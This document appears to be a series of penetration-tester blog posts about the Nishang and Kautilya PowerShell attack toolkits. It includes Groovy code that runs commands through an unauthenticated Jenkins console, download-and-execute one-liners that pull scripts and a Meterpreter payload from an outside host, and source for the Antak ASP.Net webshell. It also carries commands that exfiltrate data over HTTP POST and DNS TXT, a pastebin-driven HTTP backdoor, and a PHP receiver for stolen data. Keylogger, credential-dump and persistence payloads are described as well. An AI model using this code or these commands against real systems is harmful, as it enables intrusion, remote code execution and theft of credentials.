Hacking Jenkins Servers With No Password - Powershell fun

This post is stolen/copied/inspired from the post by Royce Davis. He posted the awesome original post here on Pentest Geek. I am just taking the hack forward using Nishang and powershell for doing nasty things.

After reading that post I quickly downloaded Jenkins and set it up in my lab. Royce used below code to execute commands on the Jenkins Server.

def sout = new StringBuffer(), serr = new StringBuffer()
def proc = '[INSERT COMMAND]'.execute()
proc.consumeProcessOutput(sout, serr)
proc.waitForOrKill(1000)
println "out> $sout err> $serr"

Lets see the version of powershell on the server by using def proc = 'powershell.exe $psversiontable'.execute() in the above code.

And the result is.

Version 2.0. So we can run powershell cmdlets and other commands. Perfect!

Now lets use powershell one-liner downloader to execute different scripts from Nishang on the Jenkins Server.

To execute the scripts we have to append cmd /c to the powershell command. So, for example, to execute Firebuster from Nishang the code becomes

def proc = 'cmd /c powershell.exe -c IEX ((New-Object Net.WebClient).DownloadString(\'http://192.168.254.1/FireBuster.ps1\'));FireBuster 192.168.254.1 4444-4446'.execute()

We can also use encoded scripts. Using Invoke-Encode in Nishang, lets encode Get-Information and execute it.

And the output

What's an exploitation without a meterpreter? So lets use the powershell meterpreter payload generated using msf.

And we have a meterpreter session !

So, the conclusion is, whenever and wherever you are able to execute commands on a Windows machine, try to execute powershell commands and you would be happily surprised.

Nishang could be found here:  https://github.com/samratashok/nishang

Enjoy!

Introducing Antak - A webshell which utilizes powershell

Duing penetration tests, I always wanted to have a simple yet powerful webshell. For that, I wrote Antak last year, demonstrated it at Defcon 21 but never released for I was busy in other things :)

Antak stands for God of Death in Indian mythology, popularly known as Yamraj. Muhahaha

The webshell is a part of Nishang now. It is written in ASP.Net.

Antak's UI has been designed to resemble a powershell console.

Use clear to clear the output box. Use help to see the built-in help.

Lets see some of its features.

Running Commands

To run commands on the target machine, just type those in the command text box and press enter or click on submit.

Each command is executed in a separate powershell process. To run multiple commands in a single process, use semi-colon (;) separated commands like cd..;pwd;ls

You are effectively sitting on a powershell prompt with -noninteractvie and -executionpolicy bypass parameters. So all powershell commands would run. Great!

Code snip for command execution:

void execcommand(string cmd)
{
    output.Text += "PS> " + "\n" + do_ps(cmd);
    console.Text = string.Empty;
    console.Focus();
}
string do_ps(string arg)
{
    //This section based on cmdasp webshell by http://michaeldaw.org
    ProcessStartInfo psi = new ProcessStartInfo();
    psi.FileName = "powershell.exe";
    psi.Arguments = "-noninteractive " + "-executionpolicy bypass " + arg;
    psi.RedirectStandardOutput = true;
    psi.UseShellExecute = false;
    Process p = Process.Start(psi);
    StreamReader stmrdr = p.StandardOutput;
    string s = stmrdr.ReadToEnd();
    stmrdr.Close();
    return s;
}

Upload a file

To upload a file using Antak:

1. Write the path writable directory in command box. Usually, at least C:\Windows\Temp should be writable.

2. Use the browse button to locate the file on your local machine.

3. Click on "Upload the file" button.
Also, lets verify if the file has been uploaded.

 Nice! The file has been uploaded.

Code for this:

protected void uploadbutton_Click(object sender, EventArgs e)
{
    if (upload.HasFile)
    {
        try
        {
            string filename = Path.GetFileName(upload.FileName);
            upload.SaveAs(console.Text + "\\" + filename);
            output.Text = "File uploaded to: " + console.Text + "\\" + filename;
        }
        catch (Exception ex)
        {
            output.Text = "Upload status: The file could not be uploaded. The following error occured: " + ex.Message;
        }
    }
}

Download a file

To download a file, just write/copy its complete path in command box and click on the "download" button.

 

 And this downloaded text file contains username and password to another machine. Of course, you won't find such things in an enterpreise enviroonment (pun intended) :D

Code for download:

protected void downloadbutton_Click(object sender, EventArgs e)
{
    try
    {
        Response.ContentType = "application/octet-stream";

        Response.AppendHeader("Content-Disposition", "attachment; filename=" + console.Text);

        Response.TransmitFile(console.Text);

        Response.End();

    }

        
        catch (Exception ex)
        {
            output.Text = ex.ToString();
        }
}

Executing Scripts

There are many ways how a script could be executed using Antak. 

UPDATE: In methods 1 and 2 below the script does not touch disk (someone asked me this).

1. Paste the script in command box and click "Encode and Execute".

Lets try this with the egress testing script Firebuster.ps1

 

2. Using powershell one-liner for download & execute. Paste the one-liner in command box and click on execute.
Lets try this with powershell payload generated using msf.

The one liner which could be used is:

IEX ((New-Object Net.WebClient).DownloadString('URL to script here')); [Arguments here]

3. An uploaded script could be executed in the usual way.
Lets upload powerpreter on the target and use Get-Information function.

Handy!

Remoting/Pivoting

Recall that we are practically on a powershell prompt. So lets try to use powershell remoting to execute commands on remote machines. Two things which are required for using powershell remoting from Antak are:

1. Administrative credentials for the target remote system.
2. Powershell remoting must already be enabled between system where Antak is residing and the target machine. As it is not possible to change any settings due to low privileges under which Antak runs.

Recall that we downloaded a plain-text credential for a remote machine. That could be used now.

Following semi-colon(;) separated commands could be used to achieve this. This command takes username and password in plain and exeucte ipconfig on the target.

$user = \"samratashok\Nikhil\"; $pass = ConvertTo-SecureString -String \"password\" -asplaintext -force; $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $user, $pass; Invoke-Command -ComputerName SamratAshok -Scriptblock {ipconfig} -Credential $Credential

Lets use this :)

Great! We are able to execute commands on the remote machine.

That is it for Antak, hope you liked it. It is a part of Nishang and could be found here: https://github.com/samratashok/nishang

If you would like to see Antak in action, you may like to see the webcast I did for Garage4hackers:



I look forward to feedback, bugs and feature requests.

Nishang 0.3.4 - Nishang Module, Dot Sourcing, Leaner scripts, New Exfiltration methods and bug fixes.

This update of Nishang makes some basic changes in how Nishang could be used.

You can now use Nishang as a module. Just import Nishang.psm1 by using

PS C:\nishang> Import-Module C:\nishang\nishang.psm1

Now, list and use all the functions available

PS C:\nishang> Get-Command -Module nishang

You can use any function from above as you use the scripts.

The code of nishang.psm1 is this

Get-ChildItem -Recurse (Join-Path $PSScriptRoot *.ps1) | ForEach-Object { if ($_.Name -ne "Keylogger.ps1") {. $_.FullName}}

It just imports all scripts in the Nishang folder in the current session. It excercises no export control so you may see some functions which themselves are part of other functions. Note that the code shows that we are not loading Keylogger. In my testing, I found Keylogger should be left alone :)

Dot Sourcing

Next, if you like to use individual scripts (like I do), the scripts in Nishang, other then the Keylogger, now runs with dot sourcing.

PS C:\nishang\Gather> . .\Get-Information.ps1
PS C:\nishang\Gather> Get-Information

Leaner Scripts

The exfiltration option has been removed from every script but Keylogger annd the three Backdoors. This not only makes those leaner (again) but also less complex to use. But, since I have been working on using Nishang scripts in client side attacks, it doesn't make sense to remove the exfitration altogether.

If you need exfiltration in a script just use Add-Exfiltration in the Utility folder and pass to it the path of the script.

PS C:\nishang> PS > Add-Exfiltration -ScriptPath C:\nishang\Gather\Get-Information.ps1 -FilePath C:\test\Get-Information_exfil.ps1

PS C:\nishang\Gather> . .\Get-Information_exfil.ps1

PS C:\nishang\Gather> Get-Information | Do-Exfiltration -ExfilOption webserver -URL http://yourwebserver.com

New Exfiltration Methods

You can now use your own weberver which could log POST requests and a DNS server which could log TXT queries as exfiltration options. The webserver option could be seen in above example of leaner scripts.

Lets see an example of using DNS txt queries.

PS C:\nishang>
HTTP-Backdoor http://pastebin.com/raw.php?i=jqP2vJ3x http://pastebin.com/raw.php?i=Zhyf8rwh start123 stopthis -exfil -ExfilOption DNS -DomainName example.com -AuthNS <dns>

Both Webserver and DNS methods encodes data using Carols Perez's Compress-PostScript. You can decode it using Invoke-Decode in the Utility folder.

Parameters have been rearaanged in all the scripts to make the code more readable.

Here is the CHANGELOG:

0.3.4
- Minor improvements in StringtoBase64.ps1
- Fixed a typo in Firelistener. Client port was not being displayed.
- All the scripts could be run using "dot source" now.
- All the scripts in Nishang could be loaded into current powershell session by importing Nishang.psm1 module.
- Added new exfiltration options, POST requests to Webserver and DNS txt queries.
- Removed exfiltration support for tinypaste.
- Exfiltration options have been removed from all scripts but Backdoors and Keylogger.
- Added Nishang.psm1
- Added Do-Exfiltration.ps1.
- Added Add-Exfiltration.ps1.
- Added Invoke-Decode.ps1.
- Removed Browse_Accept_Applet.ps1

Nishang could be found here https://github.com/samratashok/nishang

I welcome any feedbacks, bugs and feature requests.

Egress Testing using PowerShell

Imagine that you pwned a box during a pen test. You want to know if it is possible to acess the internet/other network on any port. This is what egress testing is, for me. I am happy to give you Firebuster and Firelistener, a pair of powershell scripts which could be used for the purpose. The scripts are written by Nikhil Sreekumar(@roo7break) and me (yes we have the same first name :P). He blogged about it sometime back. You can read about it here. The code has been updated and improved for Nishang.

We can use the scripts this way.

1. Run the Firelistener on our machine (we are the attacker/listener)

2. Run the FireBuster on the target machine.

3. You can see the open ports on FireListener console.

Handy!

LIMITATION
While using FireListener for more than 100-150 ports, it overwhelms the listening machine (the attacker's machine). I am trying to improve on this. I would really love if someone can improve it. Also, FireListener sometimes "misses" restarting a job for a port to which a connection has been made. This is due to the delay introduced before restarting the jobs.

With this blog post, some more updates have been pushed to Nishang. The CHANGELOG

0.3.2.2
- Download_Execute_PS.ps1 can now download and execute a Powershell script without writing it to disk.
- Execute_OnTime.ps1 and HTTP-Backdoor.ps1 executed the payload without downloading a file to disk.
- Fixed help in Brute-Force function in Powerpreter.
- Execute-OnTime, HTTP-Backdoor and Download-Execute-PS in Powerpreter now execute powershell scripts without downloading a file to disk.
- Added Firebuster.ps1 and Firelistener.ps1

Firebuster and Firelistener are available in Nishang repository.
http://code.google.com/p/nishang/source/browse/trunk


I would love to hear feedback and bugs on this. Please leave comments.

Kautilya 0.4.5 - Reboot Persistence, DNS TXT exfiltration and more

This update of Kautilya introduces reboot persistence for HTTP Backdoor, DNS TXT Backdoor and Keylogger. The payloads for Windows have been rearranged in five categories making the menu clearer.

Another major improvement has been the addition of DNS TXT exfiltration and HTTP POST exfiltration to your own website. That means, your need not leave credentials of your pastebin/gmail on target.  Note that in case of gmail, you can use application specific passwords. Both of these exfiltration methods were suggested by users.

https://groups.google.com/d/msg/kautilya-users/v6IFWuGYHb8/e-NxnOD_Av8J
https://twitter.com/theart42/status/449891861352960000


So, please keep the feature requests and suggestions coming :)

Persistence
WMI permanent event consumer is included in the code for persistence, But actually, it is not being used by any payload! Why? Because, it requires administrative privileges and both the backdoors run with non-admin privileges. In the case of Keylogger too, only Run registry key is used. Besides the above reason, there is one more catch, the WMI permanenet event consumer we are using, executes the payload with SYSTEM privileges on system reboot while the Keylogger logs keys in the context of the user it runs. This makes it necesarry to run the Keylogger with the privileges of current user and not SYSTEM.

So persistence using WMI is included for future use. Do leave a comment if you think additional payloads needs persistence. It is trivial to do but needs little code changes in .ino or .pde file of that payload.

A powershell script Remove-Persistence.ps1 has been added in the extras directory which could be used to remove persistence added by various payloads in Kautilya.


Exfiltration

DNS TXT Exfiltration

In my lab, 192.168.254.228 is running a BIND DNS Server with querylogging enabled. I used these tutorials for setting it up:

http://ubuntuforums.org/showthread.php?t=236093
http://www.gypthecat.com/how-to-log-bind-queries-on-ubuntu-12-10


Lets use the DNS exfiltration with the "Get Target Credentials" payload (and I am running Kautilya on Windows)

After compiling and uploading the generated payload to a HID, lets connect it a VM, we see this:

The exfiltration method could also be used for bigger data, it simply divides the data and sends multiple queries. I will soon write a separate blog post to cover that.

Now, this data is compressed and encoded using the method found here. To decode it, use Decode.ps1 which has been added to the extras directory.

Great! We were able to exfiltrate data using only DNS TXT queries.

HTTP POST Exfiltration

A VM in my lab is running a simple code, which I got from stackoverflow.

<?php file_put_contents('/var/www/test/test.txt', file_get_contents('php://input')); ?>

Now, lets try this with the WLAN Keys Dump payload.

And we can see this on the web server:

Decoding it using Decode.ps1

Size of the payloads
Those who take interest in source code of Kautilya may notice that all the payloads have been made more modular. It means, if you chose not to do exfiltration the payload would be much smaller now, unlike earlier. Same goes for persistemce. This makes it easier to use payloads of Kautilya on various devices.


Here is the full CHANGELOG

0.4.5
- Bug fixes and improvements in Time Based Exec. It now supports exfiltration and could be stopped remotely.
- Less lines of code for HTTP Backdoor and Download Execute PS.
- HTTP Backdoor, Download Execute PS, Hashdump and Exfiltrate and Dump LSA Secrets now execute the downloaded script in memory.
- Shortened parameters passed to powershell.exe when the scripts are called. Thus, saving the time in "typing" by HID.
- Added two new exfiltration options, POST requests and DNS TXT records.
- Username and password for exfiltration would be asked only if you select gmail or pastebin.
- Tinypaste as an option for exfiltration has been removed.
- Payloads have been made more modular which results in smaller size.
- Reboot Persistence has been added to HTTP Backdoor and DNS TXT Backdoor.
- Menu redesign.
- Bug fix in Dump LSA Secrets payload.
- Added ./extras/Decode.ps1. Use this to decode data exfiltrated by HTTP Backdoor and DNS TXT Backdoor.
- Added ./extras/Remove-Persistence.ps1. Use this to remove persistence by Keylogger, HTTP Backdoor and DNS TXT Backdoor.
- Kautilya could be run on Windows if win32console gem is installed.


You can find kautilya here: http://code.google.com/p/kautilya/source/browse/trunk

As always, I welcome feedback, bugs and feature requests.